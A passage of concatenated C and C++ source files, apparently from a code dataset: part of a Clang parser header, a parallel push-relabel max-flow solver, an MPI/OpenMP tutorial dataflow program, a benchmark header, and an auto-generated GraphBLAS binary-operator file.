if (Kind == tok::annot_module_begin || Kind == tok::annot_module_end ||
Kind == tok::annot_module_include)
return parseMisplacedModuleImport();
return false;
}
bool ParseModuleName(
SourceLocation UseLoc,
SmallVectorImpl<std::pair<IdentifierInfo *, SourceLocation>> &Path,
bool IsImport);
//===--------------------------------------------------------------------===//
// C++11/G++: Type Traits [Type-Traits.html in the GCC manual]
ExprResult ParseTypeTrait();
//===--------------------------------------------------------------------===//
// Embarcadero: Arary and Expression Traits
ExprResult ParseArrayTypeTrait();
ExprResult ParseExpressionTrait();
//===--------------------------------------------------------------------===//
// Preprocessor code-completion pass-through
void CodeCompleteDirective(bool InConditional) override;
void CodeCompleteInConditionalExclusion() override;
void CodeCompleteMacroName(bool IsDefinition) override;
void CodeCompletePreprocessorExpression() override;
void CodeCompleteMacroArgument(IdentifierInfo *Macro, MacroInfo *MacroInfo,
unsigned ArgumentIndex) override;
void CodeCompleteNaturalLanguage() override;
};
} // end namespace clang
#endif
|
push_relabel_segment.h | //
// Created by Jan Groschaft on 2/1/19.
//
/*
* Parallel implementation of push-relabel algorithm, divides the network into multiple segments.
*/
#ifndef MAXFLOW_GOLDBERG_CR_H
#define MAXFLOW_GOLDBERG_CR_H
#include "../../common_types.h"
#include "../../data_structures/linked_list.h"
#include "../../data_structures/thread_local_buffer_pool.h"
#include "partitioning.h"
#include <memory>
#include <cassert>
#include <chrono>
#include <cstring>
#include <omp.h>
#include <algorithm>
#include <atomic>
#include <set>
#ifndef CACHE_LINE_SIZE
#define CACHE_LINE_SIZE 64
#endif
namespace push_relabel_segment
{
template <template <class> typename vector, typename T, typename U>
class max_flow_instance
{
struct alignas (CACHE_LINE_SIZE) vertex
{
vertex * next = nullptr;
vertex * prev = nullptr;
U excess { 0 };
T label;
T original_label;
std::atomic_flag discovered = ATOMIC_FLAG_INIT;
};
struct label_info
{
data_structures::linked_list<vertex> active_vertices { };
data_structures::linked_list<vertex> inactive_vertices { };
void reset ( ) noexcept
{
active_vertices . clear ();
inactive_vertices . clear ();
}
};
vector<vector<cached_edge<T, U>>> _residual_network;
std::unique_ptr<label_info[]> _labels;
std::unique_ptr<vertex[]> _vertices;
data_structures::thread_local_buffer_pool<T> _pool;
std::unique_ptr<T[]> _q;
std::unique_ptr<label_info[]> _thread_local_labels;
T _source, _sink, _highest_active { 0 }, _highest_vertex { 0 };
std::size_t _thread_count, _original_relabel_threshold { 0 };
const std::size_t _max_thread_count;
int64_t _min_cpu_time_per_phase { 0 };
std::atomic<std::size_t> _relabel_threshold { 0 };
public:
max_flow_instance ( vector<vector<cached_edge<T, U>>> graph, T source, T sink,
std::size_t thread_count = static_cast<size_t>(omp_get_max_threads ()) )
:
_residual_network ( std::move ( graph ) ),
_labels ( std::make_unique<label_info[]> ( _residual_network . size () + 1 ) ),
_vertices ( std::make_unique<vertex[]> ( _residual_network . size () ) ),
_pool ( data_structures::thread_local_buffer_pool<T> { thread_count, _residual_network . size () } ),
_q ( std::make_unique<T[]> ( _residual_network . size () ) ),
_thread_local_labels ( std::make_unique<label_info[]> ( thread_count ) ),
_source ( source ), _sink ( sink ), _thread_count ( thread_count ),
_max_thread_count ( thread_count )
{
omp_set_num_threads ( static_cast<int> ( _max_thread_count ) );
init ();
}
U find_max_flow ( )
{
global_relabel ();
while ( _highest_active != 0 )
{
parallel_phase ();
global_relabel ();
}
return _vertices[_sink] . excess;
}
void preflow_to_flow ( )
{
std::swap ( _source, _sink );
_highest_vertex = _residual_network . size ();
find_max_flow ();
std::swap ( _source, _sink );
#ifdef DEBUG
for ( std::size_t i = 0; i < _residual_network . size(); ++i )
if ( i != _source && i != _sink )
if ( _vertices[i] . excess > 0 )
std::cerr << "Excess violation: vertex " << i << ", excess " << _vertices[i] . excess << '\n';
#endif
}
auto steal_network ( )
{
return std::move ( _residual_network );
}
private:
static constexpr T ALPHA = 6, BETA = 12;
static constexpr double GLOBAL_RELABEL_FREQ = 1;
static constexpr T min_active_per_thread = 10;
void init ( ) noexcept
{
#pragma omp parallel for schedule(static)
for ( std::size_t i = 0; i < _residual_network[_source] . size (); ++i )
{
auto & edge = _residual_network[_source][i];
_vertices[edge . dst_vertex] . excess = edge . r_capacity;
edge . reverse_r_capacity += edge . r_capacity;
_residual_network[edge . dst_vertex][edge . reverse_edge_index] . r_capacity += edge . r_capacity;
_residual_network[edge . dst_vertex][edge . reverse_edge_index] . reverse_r_capacity -= edge . r_capacity;
edge . r_capacity = 0;
}
std::size_t m = 0;
for ( std::size_t i = 0; i < _residual_network . size (); ++i )
m += _residual_network[i] . size ();
_original_relabel_threshold = ( _residual_network . size () * ALPHA + m / 2 );
}
struct thread_local_data
{
int64_t & cpu_time;
const T low;
const T high;
T & highest_active;
T & highest_vertex;
T relabel_progress;
};
void parallel_phase ( )
{
for ( ;; )
{
_relabel_threshold = _original_relabel_threshold;
const auto partitions = partitioning::get_partitions ( _labels, _highest_active, _thread_count, min_active_per_thread );
const auto actual_thread_cnt = partitions . size () - 1;
omp_set_num_threads ( static_cast<int> ( actual_thread_cnt ) );
int64_t cpu_time = 0;
if ( actual_thread_cnt == 1 )
{
push_relabel ( thread_local_data { cpu_time, 0, static_cast<T> ( _residual_network . size () ),
_highest_active, _highest_vertex, 0 } );
_thread_count = std::min ( _thread_count * 2, _max_thread_count );
return;
}
T highest_active = 0, highest_vertex = 0;
#pragma omp parallel for schedule(static) reduction(+:cpu_time) reduction(max:highest_active) reduction(max:highest_vertex)
for ( std::size_t i = 0; i < actual_thread_cnt; ++i )
{
T low = partitions[i], high = partitions[i + 1];
highest_active = highest_vertex = high - 1;
push_relabel ( thread_local_data { cpu_time, low, high, highest_active, highest_vertex, 0 } );
_relabel_threshold -= _original_relabel_threshold / actual_thread_cnt;
//add back vertices that are still active but couldn't have been relabeled to higher partition
_labels[high -
1] . active_vertices . append_list ( _thread_local_labels[omp_get_thread_num ()] . active_vertices );
if ( !_labels[high - 1] . active_vertices . empty () )
highest_active = highest_vertex = high - 1;
}
_highest_active = highest_active;
_highest_vertex = std::max ( _highest_vertex, highest_vertex );
if ( cpu_time > _min_cpu_time_per_phase )
{
_thread_count = std::min ( _thread_count * 2, _max_thread_count );
return;
}
_thread_count = std::max ( actual_thread_cnt / 2, std::size_t { 1 } );
omp_set_num_threads ( static_cast<int> ( _max_thread_count ) );
#pragma omp parallel for schedule(static)
for ( std::size_t i = 0; i < _residual_network . size (); ++i )
_vertices[i] . original_label = _vertices[i] . label;
}
}
void push_relabel ( thread_local_data data ) noexcept
{
auto start = std::chrono::high_resolution_clock::now ();
for ( ;; )
{
auto node = get_active_vertex ( data . highest_active, data . low );
auto label = data . highest_active;
if ( node == nullptr )
break;
discharge ( node, label, data );
if ( data . relabel_progress * GLOBAL_RELABEL_FREQ >=
_relabel_threshold . load ( std::memory_order_relaxed ) )
{
break;
}
}
auto end = std::chrono::high_resolution_clock::now ();
data . cpu_time += std::chrono::duration_cast<std::chrono::milliseconds> ( end - start ) . count ();
}
inline auto get_active_vertex ( T & highest_active, const T low ) noexcept
{
for ( T i = 0; i < highest_active - low; ++i ) //don't take vertices in low
{
if ( _labels[highest_active - i] . active_vertices . empty () )
continue;
auto * node = _labels[highest_active - i] . active_vertices . pop ();
highest_active -= i;
return node;
}
return static_cast<vertex *> (nullptr);
}
inline T get_vertex_idx ( vertex * n ) const noexcept
{
return std::distance ( _vertices . get (), n );
}
inline void discharge ( vertex * v, T label, thread_local_data & data ) noexcept
{
T vertex = get_vertex_idx ( v );
for ( ;; )
{
if ( push ( vertex, label, data ) )
{
_labels[label] . inactive_vertices . push ( v );
return;
}
label = relabel ( vertex, label, data );
if ( label >= data . high )
return;
}
}
//original labels have to be set before the parallel phase starts and they don't change until the next one
inline bool same_thread ( const T original_label, const T low, const T high ) const noexcept
{
return original_label >= low && original_label < high;
}
inline bool push ( const T vertex, const T label, const thread_local_data & data ) noexcept
{
const auto target_label = label - 1;
for ( auto & edge : _residual_network[vertex] )
{
if ( edge . r_capacity > 0 &&
same_thread ( _vertices[edge . dst_vertex] . original_label, data . low, data . high )
&& _vertices[edge . dst_vertex] . label == target_label )
{
auto flow = std::min ( _vertices[vertex] . excess, edge . r_capacity );
if ( _vertices[edge . dst_vertex] . excess == 0 && edge . dst_vertex != _sink )
{
auto * node = &_vertices[edge . dst_vertex];
_labels[target_label] . inactive_vertices . remove ( node );
_labels[target_label] . active_vertices . push ( node );
}
_vertices[vertex] . excess -= flow;
_vertices[edge . dst_vertex] . excess += flow;
edge . r_capacity -= flow;
edge . reverse_r_capacity += flow;
_residual_network[edge . dst_vertex][edge . reverse_edge_index] . reverse_r_capacity -= flow;
_residual_network[edge . dst_vertex][edge . reverse_edge_index] . r_capacity += flow;
if ( _vertices[vertex] . excess == 0 )
return true;
}
}
return false;
}
inline T relabel ( const T vertex, const T current_label, thread_local_data & data ) noexcept
{
data . relabel_progress += BETA;
const auto new_label = calculate_new_label ( vertex, data );
_vertices[vertex] . label = std::min ( new_label, data . high - 1 );
if ( new_label < data . high )
{
data . highest_vertex = std::max ( data . highest_vertex, new_label );
data . highest_active = new_label - 1;
} else if ( data . high != _residual_network . size () )
//vertex is still active, but we cannot relabel it to another partition, so we remember it and add it back to active vertices at the end of this phase
_thread_local_labels[omp_get_thread_num ()] . active_vertices . push ( &_vertices[vertex] );
if ( _labels[current_label] . active_vertices . empty () &&
_labels[current_label] . inactive_vertices . empty () &&
current_label != data . high - 1 )
{
gap_relabel ( current_label, data );
_vertices[vertex] . label = _residual_network . size ();
}
return new_label;
}
inline T calculate_new_label ( const T vertex, thread_local_data & data ) noexcept
{
T increase_to = data . high - 1;
for ( auto & edge : _residual_network[vertex] )
{
if ( edge . r_capacity == 0 ||
!same_thread ( _vertices[edge . dst_vertex] . original_label, data . low, data . high ) )
continue;
increase_to = std::min ( increase_to, _vertices[edge . dst_vertex] . label );
}
data . relabel_progress += _residual_network[vertex] . size ();
return increase_to + 1;
}
void global_relabel ( ) noexcept
{
auto start = std::chrono::high_resolution_clock::now ();
omp_set_num_threads ( static_cast<int> ( _max_thread_count ) );
const auto not_reached = _residual_network . size ();
#pragma omp parallel for schedule(static)
for ( std::size_t i = 0; i < _residual_network . size (); ++i )
{
_vertices[i] . discovered . clear ( std::memory_order_relaxed );
_vertices[i] . label = _vertices[i] . original_label = not_reached;
}
#pragma omp parallel for schedule(static)
for ( std::size_t i = 0; i <= _highest_vertex; ++i )
_labels[i] . reset ();
_vertices[_sink] . label = _vertices[_sink] . original_label = 0;
_vertices[_sink] . discovered . test_and_set ( std::memory_order_relaxed );
_highest_active = 0;
_q[0] = _sink;
std::size_t current_queue_size = 1;
T current_distance = 0;
while ( current_queue_size > 0 )
{
#pragma omp parallel for schedule(static)
for ( std::size_t i = 0; i < current_queue_size; ++i )
{
auto thr_id = omp_get_thread_num ();
auto current_vertex = _q[i];
for ( auto edge : _residual_network[current_vertex] )
{
if ( edge . reverse_r_capacity > 0 )
{
if ( !_vertices[edge . dst_vertex] . discovered . test_and_set ( std::memory_order_relaxed ) )
{
_vertices[edge . dst_vertex] . label = current_distance + 1;
_vertices[edge . dst_vertex] . original_label = current_distance + 1;
_pool . push_back ( edge . dst_vertex, static_cast<std::size_t>(thr_id) );
auto * node = &_vertices[edge . dst_vertex];
if ( _vertices[edge . dst_vertex] . excess > 0 )
_thread_local_labels[thr_id] . active_vertices . push ( node );
else
_thread_local_labels[thr_id] . inactive_vertices . push ( node );
}
}
}
}
current_queue_size = _pool . swap_data ( _q );
++current_distance;
for ( std::size_t i = 0; i < _max_thread_count; ++i ) //append together all thread_local info
{
_labels[current_distance] . active_vertices . append_list ( _thread_local_labels[i] . active_vertices );
_labels[current_distance] . inactive_vertices . append_list (
_thread_local_labels[i] . inactive_vertices );
}
if ( !_labels[current_distance] . active_vertices . empty () )
_highest_active = current_distance;
}
_highest_vertex = current_distance - 1;
omp_set_num_threads ( static_cast<int> ( _thread_count ) );
auto end = std::chrono::high_resolution_clock::now ();
_min_cpu_time_per_phase = std::chrono::duration_cast<std::chrono::milliseconds> ( end - start ) . count ();
}
//gap heuristic restricted to single segment
void gap_relabel ( const T gap_height, const thread_local_data & data ) noexcept
{
for ( auto current_height = gap_height + 1; current_height <= data . highest_vertex; ++current_height )
{
while ( !_labels[current_height] . active_vertices . empty () )
{
auto * ptr = _labels[current_height] . active_vertices . pop ();
auto vertex_idx = get_vertex_idx ( ptr );
_vertices[vertex_idx] . label = _residual_network . size ();
}
while ( !_labels[current_height] . inactive_vertices . empty () )
{
auto * ptr = _labels[current_height] . inactive_vertices . pop ();
auto vertex_idx = get_vertex_idx ( ptr );
_vertices[vertex_idx] . label = _residual_network . size ();
}
}
data . highest_vertex = data . highest_active = std::max ( gap_height - 1, data . low );
}
};
}
#endif //MAXFLOW_GOLDBERG_CR_H
|
right_synch_p2p_dataflow.c | /*
* This file is part of a small series of tutorial,
* which aims to demonstrate key features of the GASPI
* standard by means of small but expandable examples.
* Conceptually the tutorial follows a MPI course
* developed by EPCC and HLRS.
*
* Contact point for the MPI tutorial:
* rabenseifner@hlrs.de
* Contact point for the GASPI tutorial:
* daniel.gruenewald@itwm.fraunhofer.de
* mirko.rahn@itwm.fraunhofer.de
* christian.simmendinger@t-systems.com
*/
#include "assert.h"
#include "constant.h"
#include "data.h"
#include "topology.h"
#include "now.h"
#include "mm_pause.h"
#include <malloc.h>
#include <stdlib.h>
#include <mpi.h>
#include <stdio.h>
#include <omp.h>
/* global stage counters for comp */
static volatile counter_t *compStage = NULL;
#define MIN(x,y) ((x)<(y)?(x):(y))
int main (int argc, char *argv[])
{
int i, j;
int nProc, iProc;
int provided, required = MPI_THREAD_MULTIPLE;
MPI_Init_thread(&argc, &argv, required, &provided);
ASSERT(required == MPI_THREAD_MULTIPLE);
MPI_Comm_rank (MPI_COMM_WORLD, &iProc);
MPI_Comm_size (MPI_COMM_WORLD, &nProc);
// num threads
omp_set_num_threads(nThreads);
// global stage counter
compStage = malloc(nThreads * sizeof(counter_t));
// left, right neighbour (proc)
const int left = LEFT(iProc);
const int right = RIGHT(iProc);
// assignment per proc, i-direction
#ifdef USE_STRONG_SCALING
int mSize = M_SZ/nProc;
if (M_SZ % nProc != 0)
{
mSize++;
}
const int mStart = iProc*mSize + 1;
const int mStop = MIN((iProc+1)*mSize, M_SZ);
mSize = mStop-mStart+1;
#else
int mSize = M_SZ;
const int mStart = iProc*mSize + 1;
const int mStop = MIN((iProc+1)*mSize, M_SZ*nProc);
mSize = mStop-mStart+1;
#endif
// align local array
const int CL_SZ = ((mSize+1) % CL) == 0 ? (mSize+1) : CL*(1+(mSize+1)/CL);
double *array = memalign(CL* sizeof (double), CL_SZ * (nThreads+1) * (K_SZ+1) * sizeof (double));
ASSERT (array != NULL);
#pragma omp parallel default (none) shared(compStage, CL_SZ, \
mSize, array, stdout, stderr)
{
int const tid = omp_get_thread_num();
compStage[tid].global = 0;
// initialize data
data_init_tlocal(mSize, tid, array, CL_SZ);
}
data_init_global(mStart, mSize, iProc, array, CL_SZ);
int iter;
double median[NITER];
for (iter = 0; iter < NITER; iter++)
{
double time = -now();
MPI_Barrier(MPI_COMM_WORLD);
#pragma omp parallel default (none) shared(mStart, mSize, \
compStage, nThreads, iProc, nProc, stdout, stderr, array, CL_SZ)
{
int const tid = omp_get_thread_num();
MPI_Status status;
int k;
for (k = 1; k <= K_SZ; k++)
{
if (left >= 0 )
{
MPI_Recv ( &array_ELEM (0, tid+1, k)
, 1
, MPI_DOUBLE
, left
, (k-1)*nThreads+tid
, MPI_COMM_WORLD
, &status
);
}
if(tid > 0)
{
volatile int it;
while((it = compStage[tid-1].global) <= compStage[tid].global)
{
_mm_pause();
}
}
// compute */
data_compute (mStart, mSize, tid, k, array, CL_SZ);
/* increase stage counter */
compStage[tid].global++;
// issue send
if (right <= nProc - 1)
{
MPI_Send ( &array_ELEM (mSize, tid+1, k)
, 1
, MPI_DOUBLE
, right
, (k-1)*nThreads+tid
, MPI_COMM_WORLD
);
}
#ifdef USE_OMP_BARRIER
#pragma omp barrier
#endif
}
}
MPI_Barrier(MPI_COMM_WORLD);
time += now();
/* iteration time */
median[iter] = time;
}
MPI_Barrier(MPI_COMM_WORLD);
// validate */
#pragma omp parallel default (none) shared(mStart, array, CL_SZ, mSize)
{
int const tid = omp_get_thread_num();
data_validate (mStart, mSize, tid, K_SZ, array, CL_SZ);;
}
MPI_Barrier(MPI_COMM_WORLD);
sort_median(&median[0], &median[NITER-1]);
printf ("# mpi %s nProc: %d nThreads: %d M_SZ: %d K_SZ: %d niter: %d time: %g\n"
, argv[0], nProc, nThreads, M_SZ, K_SZ, NITER, median[(NITER-1)/2]
);
if (iProc == nProc-1)
{
double res = 1.0E-06 * 4 * mSize*nThreads*K_SZ*nProc / median[(NITER-1)/2];
printf("\nRate (MFlops/s): %lf\n",res);
}
free(array);
MPI_Finalize();
return EXIT_SUCCESS;
}
|
pf3dbenchvars.h | #include "mytypes.h"
/* Storage for these variables needs to be allocated ONCE
on the host. In the file responsible for allocating
storage, define __parm_init__. */
#ifdef __parm_init__
#define EXTERN
#else
#define EXTERN extern
#endif
#ifndef _PF3DBENCHVARS_H_
#ifdef OMP45
#pragma omp declare target
#endif
EXTERN int ngrd; /* number of guard cells */
EXTERN int nxa, nya, nza; /* allocated box dimensions */
EXTERN int omp_maxthreads;
EXTERN long ngtot, nplng, nmaxpln, ntheta;
/* xy arrays */
EXTERN real *theta; /* rotation angles */
/* 3D arrays */
EXTERN rcomplex *tN_new; /* temp storage for a new light wave */
EXTERN real *thetb; /* angles as a function of z */
EXTERN real *thetb_sav; /* angles as a function of z backup*/
EXTERN char *cbuf;
#ifdef OMP45
#pragma omp end declare target
#endif
#endif
#define _PF3DBENCHVARS_H_
|
GB_binop__first_fc32.c |
//------------------------------------------------------------------------------
// GB_binop: hard-coded functions for each built-in binary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2022, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated2/ folder, do not edit it
// (it is auto-generated from Generator/*).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_emult.h"
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_dense.h"
#include "GB_atomics.h"
#include "GB_bitmap_assign_methods.h"
#include "GB_binop__include.h"
// C=binop(A,B) is defined by the following types and operators:
// A+B function (eWiseAdd): GB (_AaddB__first_fc32)
// A.*B function (eWiseMult): GB (_AemultB_08__first_fc32)
// A.*B function (eWiseMult): GB (_AemultB_02__first_fc32)
// A.*B function (eWiseMult): GB (_AemultB_04__first_fc32)
// A.*B function (eWiseMult): GB (_AemultB_bitmap__first_fc32)
// A*D function (colscale): GB (_AxD__first_fc32)
// D*A function (rowscale): GB (_DxB__first_fc32)
// C+=B function (dense accum): GB (_Cdense_accumB__first_fc32)
// C+=b function (dense accum): GB (_Cdense_accumb__first_fc32)
// C+=A+B function (dense ewise3): GB ((none))
// C=A+B function (dense ewise3): GB (_Cdense_ewise3_noaccum__first_fc32)
// C=scalar+B GB ((none))
// C=scalar+B' GB ((none))
// C=A+scalar GB ((none))
// C=A'+scalar GB ((none))
// C type: GxB_FC32_t
// A type: GxB_FC32_t
// A pattern? 0
// B type: GxB_FC32_t
// B pattern? 1
// BinaryOp: cij = aij
#define GB_ATYPE \
GxB_FC32_t
#define GB_BTYPE \
GxB_FC32_t
#define GB_CTYPE \
GxB_FC32_t
// true if the types of A and B are identical
#define GB_ATYPE_IS_BTYPE \
1
// true if the types of C and A are identical
#define GB_CTYPE_IS_ATYPE \
1
// true if the types of C and B are identical
#define GB_CTYPE_IS_BTYPE \
1
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA,A_iso) \
GxB_FC32_t aij = GBX (Ax, pA, A_iso)
// true if values of A are not used
#define GB_A_IS_PATTERN \
0 \
// bij = Bx [pB]
#define GB_GETB(bij,Bx,pB,B_iso) \
;
// true if values of B are not used
#define GB_B_IS_PATTERN \
1 \
// declare scalar of the same type as C
#define GB_CTYPE_SCALAR(t) \
GxB_FC32_t t
// cij = Ax [pA]
#define GB_COPY_A_TO_C(cij,Ax,pA,A_iso) \
cij = GBX (Ax, pA, A_iso)
// cij = Bx [pB]
#define GB_COPY_B_TO_C(cij,Bx,pB,B_iso) \
cij = GBX (Bx, pB, B_iso)
#define GB_CX(p) Cx [p]
// binary operator
#define GB_BINOP(z,x,y,i,j) \
z = x ;
// true if the binop must be flipped
#define GB_BINOP_FLIP \
0
// op is second
#define GB_OP_IS_SECOND \
0
// do the numerical phases of GB_add and GB_emult
#define GB_PHASE_2_OF_2
// hard-coded loops can be vectorized
#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_FIRST || GxB_NO_FC32 || GxB_NO_FIRST_FC32)
//------------------------------------------------------------------------------
// C += A+B, all 3 matrices dense
//------------------------------------------------------------------------------
#if 0
// The op must be MIN, MAX, PLUS, MINUS, RMINUS, TIMES, DIV, or RDIV.
void GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_accum_template.c"
}
#endif
//------------------------------------------------------------------------------
// C = A+B, all 3 matrices dense
//------------------------------------------------------------------------------
void GB (_Cdense_ewise3_noaccum__first_fc32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_noaccum_template.c"
}
//------------------------------------------------------------------------------
// C += B, accumulate a sparse matrix into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumB__first_fc32)
(
GrB_Matrix C,
const GrB_Matrix B,
const int64_t *B_ek_slicing, const int B_ntasks, const int B_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if 0
{
#include "GB_dense_subassign_23_template.c"
}
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += b, accumulate a scalar into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumb__first_fc32)
(
GrB_Matrix C,
const GB_void *p_bwork,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if 0
{
// get the scalar b for C += b, of type GxB_FC32_t
GxB_FC32_t bwork = (*((GxB_FC32_t *) p_bwork)) ;
#include "GB_dense_subassign_22_template.c"
return (GrB_SUCCESS) ;
}
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = A*D, column scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_AxD__first_fc32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix D,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC32_t *restrict Cx = (GxB_FC32_t *) C->x ;
#include "GB_AxB_colscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = D*B, row scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_DxB__first_fc32)
(
GrB_Matrix C,
const GrB_Matrix D,
const GrB_Matrix B,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC32_t *restrict Cx = (GxB_FC32_t *) C->x ;
#include "GB_AxB_rowscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseAdd: C=A+B, C<M>=A+B, C<!M>=A+B
//------------------------------------------------------------------------------
GrB_Info GB (_AaddB__first_fc32)
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool is_eWiseUnion,
const GB_void *alpha_scalar_in,
const GB_void *beta_scalar_in,
const bool Ch_is_Mh,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GB_WERK_DECLARE (M_ek_slicing, int64_t) ;
GB_WERK_DECLARE (A_ek_slicing, int64_t) ;
GB_WERK_DECLARE (B_ek_slicing, int64_t) ;
GxB_FC32_t alpha_scalar ;
GxB_FC32_t beta_scalar ;
if (is_eWiseUnion)
{
alpha_scalar = (*((GxB_FC32_t *) alpha_scalar_in)) ;
beta_scalar = (*((GxB_FC32_t *) beta_scalar_in )) ;
}
#include "GB_add_template.c"
GB_FREE_WORKSPACE ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, or C<M!>=A.*B where C is sparse/hyper
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_08__first_fc32)
(
GrB_Matrix C,
const int C_sparsity,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_08_meta.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<#> = A.*B when A is sparse/hyper and B is bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_02__first_fc32)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool flipxy,
const int64_t *restrict Cp_kfirst,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if GB_BINOP_FLIP
// The operator is not commutative, and does not have a flipped
// variant. For example z=atan2(y,x).
if (flipxy)
{
// use fmult(y,x)
#undef GB_FLIPPED
#define GB_FLIPPED 1
#include "GB_emult_02_template.c"
}
else
{
// use fmult(x,y)
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
}
#else
// No need to handle the flip: the operator is either commutative, or
// has been handled by changing z=div(y,x) to z=rdiv(x,y) for example.
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<M> = A.*B, M sparse/hyper, A and B bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_04__first_fc32)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict Cp_kfirst,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_04_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, C<!M>=A.*B where C is bitmap
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_bitmap__first_fc32)
(
GrB_Matrix C,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_bitmap_emult_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (x,Bx): apply a binary operator to a matrix with scalar bind1st
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GB_void *Cx_output, // Cx and Bx may be aliased
const GB_void *x_input,
const GB_void *Bx_input,
const int8_t *restrict Bb,
int64_t bnz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC32_t *Cx = (GxB_FC32_t *) Cx_output ;
GxB_FC32_t x = (*((GxB_FC32_t *) x_input)) ;
GxB_FC32_t *Bx = (GxB_FC32_t *) Bx_input ;
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < bnz ; p++)
{
if (!GBB (Bb, p)) continue ;
; ;
Cx [p] = x ;
}
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// Cx = op (Ax,y): apply a binary operator to a matrix with scalar bind2nd
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GB_void *Cx_output, // Cx and Ax may be aliased
const GB_void *Ax_input,
const GB_void *y_input,
const int8_t *restrict Ab,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
GxB_FC32_t *Cx = (GxB_FC32_t *) Cx_output ;
GxB_FC32_t *Ax = (GxB_FC32_t *) Ax_input ;
GxB_FC32_t y = (*((GxB_FC32_t *) y_input)) ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Ab, p)) continue ;
GxB_FC32_t aij = GBX (Ax, p, false) ;
Cx [p] = aij ;
}
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// C = op (x, A'): transpose and apply a binary operator
//------------------------------------------------------------------------------
#if 0
// cij = op (x, aij), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
; ; \
Cx [pC] = x ; \
}
GrB_Info GB ((none))
(
